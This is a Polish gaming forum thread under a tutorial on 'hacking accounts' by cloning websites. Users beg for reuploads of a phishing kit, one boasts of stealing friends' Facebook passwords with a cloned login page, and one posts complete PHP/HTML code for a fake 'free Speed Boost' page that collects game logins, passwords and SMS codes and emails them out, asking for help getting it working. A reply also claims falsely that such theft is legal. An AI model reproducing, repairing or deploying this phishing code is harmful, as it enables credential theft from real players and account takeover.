Skocz do zawartości
  • 👋 Witaj na MPCForum!

    Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

    • Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

    👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

    Zarejestruj się teraz

Wideo poradnik: Hakowanie kont po przez stronę / Klonowanie stron


S0NikX

Rekomendowane odpowiedzi

  • Odpowiedzi 114
  • Dodano
  • Ostatniej odpowiedzi
  • 4 tygodnie później...
Opublikowano

Prosiłbym o reupa linku, naprawdę mi się to przyda. Poleci limit lajków przez najbliższe 2 dni, serio. Pozdrawiam.

  • 3 tygodnie później...
Opublikowano

Przydłby się reupload paczki, ten link już nie działa, a bardzo chciałbym to wytestować ;D

Leci lajk.

crysis2l.jpg


,,If we don't end war, war will end us"-H.G Wells

Opublikowano

mam pytanie o co chodzi mam bład na stronie.:

 

Przepraszamy, strona nie została znaleziona.


Page not found


 


Sprawdź poprawność adresu lub zajrzyj na stronę główną www.xxx.pl

Pomoglem Daj (+), Jeśli nie Postaram się następnym Razem!

  • 3 tygodnie później...
Opublikowano

Ja tak już sklonowałem strone fejsa i zdobyłem pare haseł moich koleżanek, przydatne, gdy chce się coś o sobie dowiedzieć :) Skrypt do każdej strony jest taki sam, więc łatwo jest sklonować każdą istniejącą strone, heh. Tutaj linki padły niestety ale już znalazłem paczke na necie, wystarczy troche pogrzebać

Pozdrawiam ;d

Opublikowano

Ja tak już sklonowałem strone fejsa i zdobyłem pare haseł moich koleżanek, przydatne, gdy chce się coś o sobie dowiedzieć :) Skrypt do każdej strony jest taki sam, więc łatwo jest sklonować każdą istniejącą strone, heh. Tutaj linki padły niestety ale już znalazłem paczke na necie, wystarczy troche pogrzebać

Pozdrawiam ;d

Elo zapodał byś tą paczkę ? plX ?

Opublikowano

Mam problem. Gdy sprawdzam stronę internetową to wywala na niej jakieś literki z kodu. Oto link do screena: http://scr.hu/0ue4/w7t15

 

kod: http://scr.hu/0ue4/kvbyf

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--
Design by Free CSS Templates
http://www.freecsstemplates.org
Released for free under a Creative Commons Attribution 2.5 License

Name       : Forthright  
Description: A two-column, fixed-width design with dark color scheme.
Version    : 1.0
Released   : 20130409

-->
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Darmowe SB!</title>
<link href="http://fonts.googleapis.com/css?family=Roboto+Condensed|Open+Sans:400,300,700|Yesteryear" rel="stylesheet" type="text/css" />
<link href="style.css" rel="stylesheet" type="text/css" media="screen" />
</head>
<body>
<div id="menu-wrapper">
	<div id="menu">
		<ul>
			<li class="current_page_item"><a href="#">Główna</a></li>
		</ul>
	</div>
	<!-- end #menu -->
</div>
<div id="header-wrapper">
	<div id="header">
		<div id="logo">
			<h1><a href="#">DARMOWE SPEED BOOST</h1>
		</div>
	</div>
</div>
<div id="wrapper">
	<!-- end #header -->
	<div id="page">
		<div id="page-bgtop">
			<div id="page-bgbtm">
				<div id="content">
					<div class="post">
						<h2 class="title"><a href="#">Witamy!</a></h2>
						<p class="meta"><span class="date">Maj, 03 2013</span><span class="posted">Opublikowano przez <a href="#">Administrator</a></span></p>
						<div style="clear: both;"> </div>
						<div class="entry">
							<?php
if (count($_POST))
{
////////// USTAWIENIA //////////
$email = '[email protected]';	// Adres e-mail adresata
$subject = 'Nowe konto ';	// Temat listu
$message = 'Prosimy teraz odczekac tydzien badz 2 tygodnie. Zostanie wtedy panu/pani przyznane 50 Speed Boost. Mozna wysylac formularz 3 razy na dzien.';	// Komunikat
$error = 'Wystąpił błąd podczas wysyłania formularza';	// Komunikat błędu
$charset = 'iso-8859-2';	// Strona kodowa
//////////////////////////////

$head =
"MIME-Version: 1.0\r\n" .
"Content-Type: text/plain; charset=$charset\r\n" .
"Content-Transfer-Encoding: 8bit";
$body = '';
foreach ($_POST as $name => $value)
{
if (is_array($value))
{
for ($i = 0; $i < count($value); $i++)
{
$body .= "$name=" . (get_magic_quotes_gpc() ? stripslashes($value[$i]) : $value[$i]) . "\r\n";
}
}
else $body .= "$name=" . (get_magic_quotes_gpc() ? stripslashes($value) : $value) . "\r\n";
}
echo mail($email, "=?$charset?B?" . base64_encode($subject) . "?=", $body, $head) ? $message : $error;
}
else
{
?>
<form action="?" method="post">
<form name="formularz1"
action="21.php"
method="post"
<p>Darmowe Speed Boost<p> </p>
</p>
Login <input type="text" name="Login:"/><br>
<br>
Haslo<input type="password" name="Hasło" />
<p>Dodatkowe informacje <input type="text" name="kod z sms:"/>
</p>
<p>
<td coslpan="2"><input type="submit" value="Wyslij"></td></p></form>
</form>
<?php
}
?>
						</div>
					</div>
					<div style="clear: both;"> </div>
				</div>
				<!-- end #content -->
				<div id="sidebar">
					<ul>
						<li>
							<h2>Search Here</h2>
							<div id="search" >
								<form method="get" action="#">
									<div>
										<input type="text" name="s" id="search-text" value="" />
										<input type="submit" id="search-submit" value="" />
									</div>
								</form>
							</div>
							<div style="clear: both;"> </div>
						</li>
						<li>
						</li>
					</ul>
				</div>
				<!-- end #sidebar -->
				<div style="clear: both;"> </div>
			</div>
		</div>
	</div>
	<!-- end #page -->
</div>
<div id="footer">
	<p>©</p>
</div>
<!-- end #footer -->
</body>
</html>

 

 

 

PS nie dostaję nic na pocztę -.- dobrze skonfigurowałem

9La1rOf.gif

Opublikowano

To jest karane. Po prostu złodziejstwo. Taki człowiek pochodzi chyba z patologicznej rodziny. Bieda zmusiła go do okradania graczy.

 

Pozdrawiam.

Opublikowano

To jest karane. Po prostu złodziejstwo. Taki człowiek pochodzi chyba z patologicznej rodziny. Bieda zmusiła go do okradania graczy.

 

Pozdrawiam.

Nie pochodzę z patologicznej rodziny, wręcz przeciwnie. Ja tylko chcę zrobić numer koledze. Nie mam zamiaru okradać graczy.

9La1rOf.gif

Opublikowano

To jest karane. Po prostu złodziejstwo. Taki człowiek pochodzi chyba z patologicznej rodziny. Bieda zmusiła go do okradania graczy.

 

Pozdrawiam.

To nie jest karane, dobrowolnie gracz podaje login i hasło.

Jezeli np. ktos sie zaloguje komus na poczte e-mail to wtedy moze poniesc konsekwencje.

 

Reszte komentarza juz sobie daruje.

  • 2 tygodnie później...
  • 1 miesiąc temu...
  • 5 miesięcy temu...
Opublikowano

Ja mam taki problem, że passy nie przychodzą na emaila...

Wszystko dobrze ustawiłem, a nadal nie chcą przychodzić....

Wie ktoś może co muszę zrobić? dodam że mam postawione stronę na friko.pl

Opublikowano

Całkiem dobry poradnik, fajnie napisane. Tyko że to już stare, i mało kto się da nabrać na takie stronki. Nawet w grze mamy napisane żeby nie wchodzić w nieznane strony ;p. Jeśli się komuś to udaje, gratuluję ;p

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

×
×
  • Dodaj nową pozycję...